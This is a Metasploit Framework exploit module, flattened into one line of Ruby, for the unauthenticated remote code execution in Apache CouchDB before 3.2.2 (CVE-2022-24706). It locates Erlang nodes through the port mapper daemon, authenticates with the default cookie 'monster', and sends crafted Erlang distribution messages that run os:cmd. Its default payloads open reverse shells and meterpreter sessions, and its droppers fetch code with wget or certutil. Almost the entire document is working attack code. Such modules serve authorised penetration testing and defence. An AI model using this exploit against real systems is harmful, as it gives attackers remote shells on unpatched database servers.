Apache CouchDB Erlang Remote Code Execution

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::Tcp  include Msf::Exploit::CmdStager  include Msf::Exploit::Retry  include Msf::Exploit::Powershell  prepend Msf::Exploit::Remote::AutoCheck  require 'msf/core/exploit/powershell'  require 'digest'  # Constants required for communicating over the Erlang protocol defined here:  # https://www.erlang.org/doc/apps/erts/erl_dist_protocol.html  EPM_NAME_CMD = "\x00\x01\x6e".freeze  NAME_MSG = "\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA".freeze  CHALLENGE_REPLY = "\x00\x15r\x01\x02\x03\x04".freeze  CTRL_DATA = "\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex".freeze  COOKIE = 'monster'.freeze  COMMAND_PREFIX = "\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k".freeze  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Apache Couchdb Erlang RCE',        'Description' => %q{          In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without          authenticating and gain admin privileges.        },        'Author'  => [          'Milton Valencia (wetw0rk)', # Erlang Cookie RCE discovery          '1F98D',                     # Erlang Cookie RCE exploit          'Konstantin Burov',          # Apache CouchDB Erlang Cookie exploit          '_sadshade',                 # Apache CouchDB Erlang Cookie exploit          'jheysel-r7',                # Msf Module        ],        'References' => [          [ 'EDB', '49418' ],          [ 'URL', 'https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit'],          [ 'CVE', '2022-24706'],        ],        'License' => MSF_LICENSE,        'Platform' => ['win', 'linux'],        'Payload' => {          'MaxSize' => 60000 # Due to the 16-bit nature of the cmd in the compile_cmd method        },        'Privileged' => false,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_openssl'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => :wget,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'              }            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Type' => :win_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'              }            }          ],          [            'Windows Dropper',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :win_dropper,              'CmdStagerFlavor' => :certutil,              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'              }            }          ],          [            'PowerShell Stager',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :psh_stager,              'CmdStagerFlavor' => :certutil,              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2022-01-21',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      ),    )    register_options(      [        Opt::RPORT(4369)      ]    )  end  def check    erlang_ports = get_erlang_ports    # If get_erlang_ports does not return an array of port numbers, the target is not vulnerable.    return Exploit::CheckCode::Safe('This endpoint does not appear to expose any erlang ports') if erlang_ports.empty?    erlang_ports.each do |erlang_port|      # If connect_to_erlang_server returns a socket, it means authentication with the default cookie has been      # successful and the target as well as the specific socket used in this instance is vulnerable      sock = connect_to_erlang_server(erlang_port.to_i)      if sock.instance_of?(Socket)        @vulnerable_socket = sock        return Exploit::CheckCode::Vulnerable('Successfully connected to the Erlang Server with cookie: "monster"')      else        next      end    end    Exploit::CheckCode::Safe('This endpoint has an exposed erlang port(s) but appears to be a patched')  end  # Connect to the Erlang Port Mapper Daemon to collect port numbers of running Erlang servers  #  # @return [Array] An array of port numbers for discovered Erlang Servers.  def get_erlang_ports    erlang_ports = []    begin      print_status("Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: #{datastore['RHOSTS']}:#{datastore['RPORT']}...")      connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => datastore['RPORT'] })      # request Erlang nodes      sock.put(EPM_NAME_CMD)      sleep datastore['WfsDelay']      res = sock.get_once      unless res && res.include?("\x00\x00\x11\x11name couchdb")        print_error('Did not find any Erlang nodes')        return erlang_ports      end      print_status('Successfully found EDPM socket')      res.each_line do |line|        erlang_ports << line.match(/\s(\d+$)/)[0]      end    rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e      print_error("Error connecting to EDPM: #{e.class} #{e}")      disconnect      return erlang_ports    end    erlang_ports  end  # Attempts to connect to an erlang server with a default erlang cookie of 'monster', which is the  # default erlang cookie value in Apache CouchDB installations before 3.2.2  #  # @return [Socket] Returns a socket that is connected and already authenticated to the vulnerable Apache CouchDB Erlang Server  def connect_to_erlang_server(erlang_port)    print_status('Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...')    connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => erlang_port })    print_status('Connection successful')    challenge = retry_until_truthy(timeout: 60) do      sock.put(NAME_MSG)      sock.get_once(5) # ok message      sock.get_once    end    # The expected successful response from the target should start with \x00\x1C    unless challenge && challenge.include?("\x00\x1C")      print_error('Connecting to the Erlang server was unsuccessful')      return    end    challenge = challenge[9..12].unpack('N*')[0]    challenge_reply = "\x00\x15r\x01\x02\x03\x04"    md5 = Digest::MD5.new    md5.update(COOKIE + challenge.to_s)    challenge_reply << [md5.hexdigest].pack('H*')    sock.put(challenge_reply)    sleep datastore['WfsDelay']    challenge_response = sock.get_once    if challenge_response.nil?      print_error('Authentication was unsuccessful')      return    end    print_status('Erlang challenge and response completed successfully')    sock  rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e    print_error("Error when connecting to Erlang Server: #{e.class} #{e} ")    disconnect    return  end  def compile_cmd(cmd)    msg = ''    msg << COMMAND_PREFIX    msg << [cmd.length].pack('S>')    msg << cmd    msg << "jw\x04user"    payload = ("\x70" + CTRL_DATA + msg)    ([payload.size].pack('N*') + payload)  end  def execute_command(cmd, opts = {})    payload = compile_cmd(cmd)    print_status('Sending payload... ')    opts[:sock].put(payload)    sleep datastore['WfsDelay']  end  def exploit_socket(sock)    case target['Type']    when :unix_cmd, :win_cmd      execute_command(payload.encoded, { sock: sock })    when :linux_dropper, :win_dropper      execute_cmdstager({ sock: sock })    when :psh_stager      execute_command(cmd_psh_payload(payload.encoded, payload_instance.arch.first), { sock: sock })    else      fail_with(Failure::BadConfig, 'Invalid target specified')    end  end  def exploit    # If the check method has already been run, use the vulnerable socket that has already been identified    if @vulnerable_socket      exploit_socket(@vulnerable_socket)    else      erlang_ports = get_erlang_ports      fail_with(Failure::BadConfig, 'This endpoint does not appear to expose any erlang ports') unless erlang_ports.instance_of?(Array)      erlang_ports.each do |erlang_port|        sock = connect_to_erlang_server(erlang_port.to_i)        next unless sock.instance_of?(Socket)        exploit_socket(sock)      end    end  endend